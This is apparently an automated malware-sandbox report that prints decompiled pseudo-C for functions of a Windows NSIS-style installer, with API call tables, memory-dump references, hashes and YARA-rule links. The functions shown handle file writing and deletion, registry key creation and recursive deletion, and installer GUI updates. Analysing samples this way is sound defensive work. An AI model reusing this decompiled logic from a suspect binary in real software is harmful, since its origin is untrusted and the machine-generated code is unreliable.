				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                        0x004026af
                        0x004026b1
                        0x004026bd
                        0x004026c0
                        0x004026ca
                        0x004026ce
                        0x004026ce
                        0x004026d4
                        0x004026e1
                        0x004026e9
                        0x004026ec
                        0x004026f2
                        0x00402700
                        0x00402705
                        0x00402709
                        0x0040270c
                        0x00402715
                        0x00402721
                        0x00402725
                        0x00402728
                        0x00402732
                        0x00402751
                        0x00402739
                        0x0040273e
                        0x00402746
                        0x00402749
                        0x0040274e
                        0x0040274e
                        0x00402758
                        0x00402758
                        0x0040276a
                        0x00402771
                        0x00402783
                        0x00402783
                        0x00402789
                        0x00402789
                        0x00402794
                        0x00402795
                        0x00402799
                        0x0040279d
                        0x004027a3
                        0x004027a3
                        0x004027aa
                        0x00402197
                        0x004028c1
                        0x004028cd

                        APIs
                        • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                        • GlobalFree.KERNEL32 ref: 00402758
                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                        • GlobalFree.KERNEL32 ref: 00402771
                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                        • String ID:
                        • API String ID: 3294113728-0
                        • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                        • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                        • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                        • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                        0x00404e8a
                        0x00404e96
                        0x00404e99
                        0x00404e9f
                        0x00404eab
                        0x00404eae
                        0x00404eb1
                        0x00404eb7
                        0x00404eb7
                        0x00404ebd
                        0x00404ec5
                        0x00404ec8
                        0x00404ee5
                        0x00404ee9
                        0x00404ef2
                        0x00404ef2
                        0x00404efc
                        0x00404f05
                        0x00404f11
                        0x00404f18
                        0x00404f1c
                        0x00404f1f
                        0x00404f32
                        0x00404f40
                        0x00404f40
                        0x00404f44
                        0x00404f46
                        0x00404f49
                        0x00000000
                        0x00404f49
                        0x00404eca
                        0x00404ed2
                        0x00404eda
                        0x00404ee0
                        0x00000000
                        0x00404ee0
                        0x00404eda
                        0x00404ec8
                        0x00404f53

                        APIs
                        • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                        • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                        • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                        • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                        • String ID:
                        • API String ID: 2531174081-0
                        • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                        • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                        • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                        • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                        0x00404761
                        0x0040476e
                        0x00404774
                        0x004047b2
                        0x004047b2
                        0x004047c1
                        0x004047c8
                        0x00000000
                        0x004047ca
                        0x00404776
                        0x00404785
                        0x0040478d
                        0x00404790
                        0x004047a2
                        0x004047a8
                        0x004047af
                        0x00000000
                        0x004047af
                        0x00000000

                        APIs
                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476E
                        • GetMessagePos.USER32 ref: 00404776
                        • ScreenToClient.USER32 ref: 00404790
                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A2
                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                        • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                        • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                        • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8200
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                        0x00402b7b
                        0x00402b89
                        0x00402b8f
                        0x00402b8f
                        0x00402b9d
                        0x00402b9f
                        0x00402ba5
                        0x00402bac
                        0x00402bae
                        0x00402bae
                        0x00402bc4
                        0x00402bd4
                        0x00402be6
                        0x00402be6
                        0x00402bee

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                        • MulDiv.KERNEL32(00008200,00000064,?), ref: 00402BB4
                        • wsprintfA.USER32 ref: 00402BC4
                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                        • SetDlgItemTextA.USER32 ref: 00402BE6
                        Strings
                        • verifying installer: %d%%, xrefs: 00402BBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: verifying installer: %d%%
                        • API String ID: 1451636040-82062127
                        • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                        • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                        • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                        • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10001100, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 286COMMON
                        Download Yara Rule
                        Strings
                        • setting window to 0x%X, xrefs: 1000134D
                        • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                        • E8 transform detected; file size %u, xrefs: 1000142A
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                        • API String ID: 0-4286174769
                        • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                        • Instruction ID: 6d95b11c59b3497aea08d982f272f40bd572d12cc0e65c72e8296be602c26041
                        • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                        • Instruction Fuzzy Hash: 92E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208519E849A7345D775A985CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                        0x00402337
                        0x0040233c
                        0x00402346
                        0x00402350
                        0x00402353
                        0x0040235d
                        0x0040236d
                        0x00402374
                        0x0040237c
                        0x0040238a
                        0x0040238e
                        0x00402399
                        0x00402399
                        0x0040239d
                        0x004023a1
                        0x004023a7
                        0x004023ac
                        0x004023ac
                        0x004023b0
                        0x004023bc
                        0x004023bc
                        0x004023d5
                        0x004023d7
                        0x004023d7
                        0x004023da
                        0x004024b0
                        0x004024b0
                        0x004028c1
                        0x004028cd

                        APIs
                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1540.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1540.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1540.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseCreateValuelstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsj1540.tmp
                        • API String ID: 1356686001-435772581
                        • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                        • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                        • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                        • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E00402A69(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423ff0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A69(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						__eflags =  *0x423ff0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}










                        0x00402a79
                        0x00402a8a
                        0x00402a92
                        0x00402aba
                        0x00402aa1
                        0x00402aa4
                        0x00402af4
                        0x00402afa
                        0x00402afc
                        0x00000000
                        0x00402afc
                        0x00402ab1
                        0x00402ab6
                        0x00402ab8
                        0x00000000
                        0x00000000
                        0x00402ab8
                        0x00402acf
                        0x00402ad7
                        0x00402ade
                        0x00402b04
                        0x00402b0a
                        0x00000000
                        0x00000000
                        0x00402b12
                        0x00402b18
                        0x00402b1a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402b1a
                        0x00000000
                        0x00402aed
                        0x00402b01

                        APIs
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                        • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                        • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Close$DeleteEnumOpen
                        • String ID:
                        • API String ID: 1912718029-0
                        • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                        • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                        • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                        • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1000D06A, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                        Download Yara Rule
                        C-Code - Quality: 96%
                        			E1000D06A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x1001da80, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x1001da7c - _t7;
								if(__eflags == 0) {
									_t9 = E1000983A(__eflags);
									 *_t9 = E10009881(GetLastError());
									goto L17;
								} else {
									__eflags = E10009807(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E1000983A(__eflags);
										 *_t12 = E10009881(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009807(_t6, _t31);
						 *((intOrPtr*)(E1000983A(__eflags))) = 0xc;
						goto L12;
					} else {
						E1000A32A(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E1000591F(__ebx, __edx, __edi, _a8);
				}
			}









                        0x1000d071
                        0x1000d07f
                        0x1000d082
                        0x1000d084
                        0x1000d093
                        0x1000d0c6
                        0x1000d0c6
                        0x1000d0c9
                        0x00000000
                        0x00000000
                        0x1000d096
                        0x1000d098
                        0x1000d09a
                        0x1000d09a
                        0x1000d09a
                        0x1000d0a7
                        0x1000d0ad
                        0x1000d0af
                        0x1000d0b1
                        0x1000d111
                        0x1000d111
                        0x1000d0b3
                        0x1000d0b3
                        0x1000d0b9
                        0x1000d0fb
                        0x1000d10f
                        0x00000000
                        0x1000d0bb
                        0x1000d0c2
                        0x1000d0c4
                        0x1000d0e3
                        0x1000d0f7
                        0x1000d0dd
                        0x1000d0dd
                        0x1000d0dd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000d0c4
                        0x1000d0b9
                        0x00000000
                        0x1000d0df
                        0x1000d0cc
                        0x1000d0d7
                        0x00000000
                        0x1000d086
                        0x1000d089
                        0x1000d08f
                        0x1000d08f
                        0x1000d0e0
                        0x1000d0e2
                        0x1000d073
                        0x1000d07d
                        0x1000d07d

                        APIs
                        • _malloc.LIBCMT ref: 1000D076
                          • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                          • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                          • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(00540000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                        • _free.LIBCMT ref: 1000D089
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: cf746dbeda67de22e21e8a810df0d00449dcee30b873dcaf11b133052e1678ed
                        • Instruction ID: 46ab3c75120eb4722f2ae3b8c3728da273cc0003fd94a562a404597a5fb6ef49
                        • Opcode Fuzzy Hash: cf746dbeda67de22e21e8a810df0d00449dcee30b873dcaf11b133052e1678ed
                        • Instruction Fuzzy Hash: A811C132804226ABFB25BF709C4574E3BC4EF022E1F61C527F94C9A259DE319A4287B0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                        0x00401ce8
                        0x00401cef
                        0x00401d1e
                        0x00401d26
                        0x00401d2d
                        0x00401d2d
                        0x004028c1
                        0x004028cd

                        APIs
                        • GetDlgItem.USER32 ref: 00401CE2
                        • GetClientRect.USER32 ref: 00401CEF
                        • LoadImageA.USER32 ref: 00401D10
                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                        • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                        • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                        • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
